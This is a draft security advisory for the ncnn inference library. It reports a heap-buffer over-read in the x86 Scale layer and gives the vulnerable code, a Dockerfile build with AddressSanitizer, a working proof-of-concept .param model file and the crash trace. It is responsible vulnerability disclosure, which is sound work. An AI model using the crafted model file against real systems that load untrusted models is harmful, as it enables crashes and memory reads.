All advisories
Draft

Packed Scale Tensor Heap Buffer Overflow

Tencent/ncnn

Affected packages

ncnn other
Affected versions= 5e66f094bf7c597b4569cc014a8be84104748678
Patched versionsNot specified

Description

Packed Scale Tensor Heap Buffer Overflow

Affected commit: 5e66f094bf7c597b4569cc014a8be84104748678
Sink: src/layer/x86/scale_x86.cpp:265 in Scale_x86::forward_inplace
Sanitizer verdict: heap-buffer-overflow

Summary

A model can declare a Scale layer in its dynamic two-input form (scale_data_size = -233) and then wire it to a scale tensor that is far smaller than the data tensor's channel count. The optimized x86 implementation reads one SIMD vector of scale values per packed channel with no size check, so a 1x1x100 data blob (packed to elempack=4, 25 channels) against a 2-element scale blob makes _mm_loadu_ps(scale + q * 4) run off the end of the scale allocation. ncnnoptimize aborts while doing shape inference on the attacker's .param file — no weight file is needed.

Detail

The untrusted fields are the Scale layer's key 0 (-233, which switches the layer to one_blob_only = false and takes the scales from a second input blob) and the two Input shapes. Scale_x86::forward_inplace takes the raw pointer of bottom_top_blobs[1] and indexes it by channel and elempack without ever consulting the scale blob's own width:

// src/layer/x86/scale_x86.cpp:31
int Scale_x86::forward_inplace(std::vector<Mat>& bottom_top_blobs, const Option& opt) const
{
    Mat& bottom_top_blob = bottom_top_blobs[0];
    const Mat& scale_blob = bottom_top_blobs[1];
...
    const float* scale = scale_blob;

// src/layer/x86/scale_x86.cpp:258
        #pragma omp parallel for num_threads(opt.num_threads)
        for (int q = 0; q < channels; q++)
        {
            float* ptr = bottom_top_blob.channel(q);

            float s = scale[q];
#if __SSE2__
            __m128 _s128 = (elempack == 4) ? _mm_loadu_ps(scale + q * 4) : _mm_set1_ps(s);

The loop bound channels comes from the data tensor, and the stride q * 4 comes from the data tensor's elempack; the scale tensor contributes only its base pointer.

The PoC's data blob is 1x1x100. With packing enabled, 100 is not a multiple of 16 or 8 but is a multiple of 4, so elempack = 4 and channels = 25. The scale blob (width 2, elempack = 1) occupies an 84-byte region — 16 bytes of aligned payload, the refcount, and the 64-byte over-read tail. The per-channel load walks it in 16-byte steps, so iteration q = 5 loads bytes 80..95 and crosses the end of the region at 84. ASan reports that 16-byte read as a heap-buffer-overflow and ncnnoptimize terminates before writing an output model; for larger q the reads would run hundreds of bytes past the buffer.

Reproduce

Build and run (writes the Dockerfile, builds ncnn with ASan, runs the PoC)
mkdir -p ncnn-poc-packed-scale-tensor-heap-buffer-overflow && cd ncnn-poc-packed-scale-tensor-heap-buffer-overflow

cat > Dockerfile <<'DOCKERFILE'
FROM ubuntu:24.04

RUN apt-get update && apt-get install -y --no-install-recommends \
      git ca-certificates g++ cmake make python3 python3-pip python3-numpy \
      protobuf-compiler libprotobuf-dev \
 && pip3 install --no-cache-dir --break-system-packages onnx protobuf \
 && rm -rf /var/lib/apt/lists/*

RUN git clone --depth 1 https://github.com/Tencent/ncnn.git /ncnn

WORKDIR /ncnn
RUN cmake -S . -B build \
      -DCMAKE_BUILD_TYPE=Debug \
      -DCMAKE_C_FLAGS="-O0 -g -fsanitize=address" \
      -DCMAKE_CXX_FLAGS="-O0 -g -fsanitize=address" \
      -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" \
      -DNCNN_BUILD_TOOLS=ON -DNCNN_BUILD_EXAMPLES=ON -DNCNN_BUILD_BENCHMARK=ON \
      -DNCNN_BUILD_TESTS=OFF -DNCNN_VULKAN=OFF -DNCNN_OPENMP=OFF \
 && cmake --build build -j"$(nproc)"

ENV ASAN_OPTIONS=detect_leaks=0
WORKDIR /poc
DOCKERFILE

cat > poc.param <<'POC_EOF'
7767517
3 3
Input data 0 1 data 0=1 1=1 2=100
Input scale 0 1 scale 0=2
Scale s 2 1 data scale out 0=-233
POC_EOF

docker build -t ncnn-asan .
docker run --rm --network none -v "$PWD:/poc" ncnn-asan \
  /ncnn/build/tools/ncnnoptimize poc.param null out.param out.bin 0

AddressSanitizer output:

shape_inference
input = data
input = scale
=================================================================
==1==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x50e000000150 at pc 0x5873ee9ab9fb bp 0x7ffeb75cc2b0 sp 0x7ffeb75cc2a0
READ of size 16 at 0x50e000000150 thread T0
    #0 0x5873ee9ab9fa in _mm_loadu_ps(float const*) /usr/lib/gcc/x86_64-linux-gnu/13/include/xmmintrin.h:940
    #1 0x5873ee9ab9fa in ncnn::Scale_x86_avx512::forward_inplace(std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/build/src/layer/x86/scale_x86_avx512.cpp:265
    #2 0x5873eaff5996 in ncnn::NetPrivate::do_forward_layer(ncnn::Layer const*, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:841
    #3 0x5873eafdeb7f in ncnn::NetPrivate::forward_layer(int, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:167
    #4 0x5873eb03e9e9 in ncnn::Extractor::extract(int, ncnn::Mat&, int) /ncnn/src/net.cpp:2939
    #5 0x5873eaed5457 in ModelWriter::estimate_memory_footprint() /ncnn/tools/modelwriter.h:542
    #6 0x5873eaf4defd in main /ncnn/tools/ncnnoptimize.cpp:2846
    #7 0x7f900729a1c9  (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #8 0x7f900729a28a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #9 0x5873eaecd624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)

0x50e000000154 is located 0 bytes after 84-byte region [0x50e000000100,0x50e000000154)
allocated by thread T0 here:
    #0 0x7f9007913f1d in posix_memalign ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145
    #1 0x5873eaf4e656 in fastMalloc /ncnn/src/allocator.h:62
    #2 0x5873eaf4e656 in MemoryFootprintAllocator::fastMalloc(unsigned long) /ncnn/tools/modelwriter.h:147
    #3 0x5873eaf9cb38 in ncnn::Mat::create(int, unsigned long, ncnn::Allocator*) /ncnn/src/mat.cpp:329
    #4 0x5873eaed4800 in ModelWriter::estimate_memory_footprint() /ncnn/tools/modelwriter.h:518
    #5 0x5873eaf4defd in main /ncnn/tools/ncnnoptimize.cpp:2846
    #6 0x7f900729a1c9  (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #7 0x7f900729a28a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #8 0x5873eaecd624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)

SUMMARY: AddressSanitizer: heap-buffer-overflow /usr/lib/gcc/x86_64-linux-gnu/13/include/xmmintrin.h:940 in _mm_loadu_ps(float const*)

Credit

Zheng Yu @ DepthFirst